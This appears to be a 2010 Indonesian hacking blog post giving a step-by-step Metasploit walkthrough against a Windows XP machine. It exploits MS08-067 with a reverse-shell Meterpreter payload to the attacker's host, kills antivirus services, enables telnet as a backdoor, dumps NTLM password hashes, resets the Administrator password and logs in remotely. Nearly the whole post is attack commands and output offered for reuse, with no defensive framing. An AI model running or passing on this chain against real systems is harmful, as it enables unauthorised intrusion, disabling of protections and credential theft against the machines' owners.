Abu Adam Al Atsari: metasploit meterpreter quiet, telnet

berikut, exploit, backdoor, dan telnet

`1`	`msf > use exploit/windows/smb/ms08_067_netapi`

`2`	`msf exploit(ms08_067_netapi) >` `set` `PAYLOAD windows/meterpreter/reverse_tcp`

`3`	`PAYLOAD => windows/meterpreter/reverse_tcp`

`4`	`msf exploit(ms08_067_netapi) >` `set` `LHOST 192.168.1.45`

`5`	`LHOST => 192.168.1.45`

`6`	`msf exploit(ms08_067_netapi) >` `set` `RHOST 192.168.1.200`

`7`	`RHOST => 192.168.1.200`

exploit

view source print ?

`1`	`msf exploit(ms08_067_netapi) > exploit -f`

2

`3`	`[*] Started reverse handler on 192.168.1.45:4444`

`4`	`[*] Automatically detecting the target...`

`5`	`[*] Fingerprint: Windows XP Service Pack 3 - lang:English`

`6`	`[*] Selected Target: Windows XP SP3 English (NX)`

`7`	`[*] Attempting to trigger the vulnerability...`

`8`	`[*] Sending stage (748032 bytes) to 192.168.1.200`

`9`	`[*] Meterpreter session 1 opened (192.168.1.45:4444 -> 192.168.1.200:1913)`

kill av, get telnet

view source print ?

`1`	`meterpreter > run killav`

`2`	`[*] Killing Antivirus services on the target...`

`3`	`[*] Killing off cmd.exe...`

`4`	`meterpreter > run gettelnet -e`

`5`	`[*] Windows Telnet Server Enabler Meterpreter Script`

`6`	`[*] Setting Telnet Server Services service startup mode`

`7`	`[*] The Telnet Server Services service is not` `set` `to auto, changing it to auto ...`

`8`	`[*] Opening port` `in` `local` `firewall` `if` `necessary`

kalo ada account selain Administrator,

view source print ?

`1`	`meterpreter > hashdump`

`2`	`Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::`

`3`	`Ray16:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::`

`4`	`Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::`

`5`	`HelpAssistant:1000:7d006c3deefcb55524e896ae900db85e:3c877a4ddf86e32f4c1e5b36217db268:::`

`6`	`SUPPORT_388945a0?:1002:aad3b435b51404eeaad3b435b51404ee:77d358f2c00b3af0f58f110c778d7f05:::`

execute, interact

view source print ?

`1`	`meterpreter > execute -f cmd.exe -c`

`2`	`Process 6220 created.`

`3`	`Channel 8 created.`

`4`	`meterpreter > interact 8`

`5`	`Interacting with channel 8...`

Set password Administrator ke “password”

view source print ?

`1`	`C:\WINDOWS>net user Administrator password`

`2`	`net user Administrator password`

`3`	`The` `command` `completed successfully.`

23, telnet aktif

view source print ?

`1`	`root@bt:~# nmap -p 23 192.168.1.200`

2

`3`	`Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-06 07:37 UTC`

`4`	`Interesting ports on 192.168.1.200:`

`5`	`PORT STATE SERVICE`

`6`	`23/tcp` `open` `telnet`

`7`	`MAC Address: 00:1F:C6:0B:1A:A1 (Asustek Computer)`

8

`9`	`Nmap` `done: 1 IP address (1 host up) scanned` `in` `0.30 seconds`

go telnet

view source print ?

`01`	`root@bt:~# telnet 192.168.1.200`

`02`	`Trying 192.168.1.200...`

`03`	`Connected to 192.168.1.200.`

`04`	`Escape character is` `'^]'.`

`05`	`Welcome to Microsoft Telnet Service`

06

`07`	`login: Administrator`

`08`	`password:`

09

`10`	`*===============================================================`

`11`	`Welcome to Microsoft Telnet Server.`

`12`	`*===============================================================`

13 C:\>

metasploit tool powerful, tinggal kreatifitas aja..
http://ray16.info/~me/?p=589

Abu Adam Al Atsari

Rabu, 16 Juni 2010

metasploit meterpreter quiet, telnet

Feedjit

Partner Link